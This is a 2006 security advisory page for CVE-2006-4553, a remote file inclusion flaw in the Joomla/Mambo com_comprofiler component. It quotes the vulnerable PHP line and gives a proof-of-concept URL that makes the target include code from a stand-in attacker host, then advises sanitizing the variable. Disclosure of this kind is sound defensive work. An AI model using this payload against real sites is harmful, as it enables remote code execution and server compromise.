Bug: Mambo/Joomla com_comprofiler Components <== v1.0 RC 2 Multiple Remote File Include Vulnerabilities ( Ascii Version )

Search:
WLB2

Mambo/Joomla com_comprofiler Components <== v1.0 RC 2 Multiple Remote File Include Vulnerabilities

Published
Credit
Risk
2006.09.07
matdhule
High
CWE
CVE
Local
Remote
CWE-94
CVE-2006-4553
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
6.8/10
6.4/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

------------------------------------------------------------------------
---

Mambo/Joomla com_comprofiler Components <== v1.0 RC 2 Multiple Remote File Include Vulnerabilities

------------------------------------------------------------------------
---

Author : Matdhule

Date : August, 25th 2006

Location : Indonesia, Jakarta

Critical Lvl : Highly critical

Impact : System access

Where : From Remote

------------------------------------------------------------------------
---

Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

com_comprofiler Components

Application : com_comprofiler

version : 1.0 RC 2

------------------------------------------------------------------------
---

Vulnerability:

~~~~~~~~~~~~~~~

in folder com_comprofiler we found vulnerability script plugin.class.php

-----------------------plugin.class.php----------------------

<?php

/**

* Plugin handler

* @package Joomla

* @author various, JoomlaJoe and Beat

*/

require_once( $mosConfig_absolute_path . '/includes/domit/xml_domit_lite_include.php' );

----------------------------------------------------------

Variables $mosConfig_absolute_path are not properly sanitized.

Proof Of Concept:

~~~~~~~~~~~~~~~~

http://[target]/[path]/administrator/components/com_comprofiler/plugin.c
lass.php?mosConfig_absolute_path= http://attacker.com/evil.txt?

Solution:

~~~~~~~~

sanitize variabel $mosConfig_absolute_path in plugin.class.php

------------------------------------------------------------------------
---

Shoutz:

~~~~~~

~ solpot a.k.a chris, J4mbi H4ck3r for the hacking lesson :)

~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous

~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama

~ newbie_hacker (at) yahoogroups (dot) com [email concealed], jasakom_perjuangan (at) yahoogroups (dot) com [email
concealed]

~ #nyubi (solpotcrew comunity) #jambihackerlink #e-c-h-o @ irc.dal.net

------------------------------------------------------------------------
---

Contact:

~~~~~~~

matdhule[at]gmail[dot]com

-------------------------------- [ EOF ] ----------------------------------

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version